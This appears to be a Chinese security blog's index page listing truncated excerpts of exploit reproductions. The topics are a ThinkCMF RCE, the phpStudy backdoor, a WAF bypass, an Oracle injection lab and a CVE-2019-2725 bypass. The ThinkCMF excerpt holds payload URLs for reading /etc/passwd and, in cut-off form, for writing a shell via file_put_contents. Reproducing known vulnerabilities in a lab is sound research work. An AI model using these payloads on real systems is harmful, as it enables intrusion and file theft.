未分类

ThinkCMF RCE

http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...

phpStudy 隐藏web后门复现

GET / HTTP/1.1 Host: 192.168.1.16 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63....

密码保护:Bypass ngx_lua_waf

pass 0x00 前言  ngx_lua_waf是一款基于ngx_lua的web应用防火墙,使用简单,高性能、轻量级。默认防御规则在wafconf目录中,摘录几条核心的SQL注入防御规则: select.+(from|...

搭建oracle 注入环境

碰到了一个很复杂的SQL 注入的oracle 注入坑。 那么就弄一个本地测试环境吧 环境:Centos 7.4   64 那么首先弄一个oracle 环境 想了一下还是用Docker 了 dock...

CVE-2019-2725 绕过 复现

CVE-2019-2725 绕过 复现 系统版本 Centos7.5 JDK 版本:jdk1.6.0_45     :直接去官网下载 weblogic 版本:10.3.6      : 直接去官网下载 ...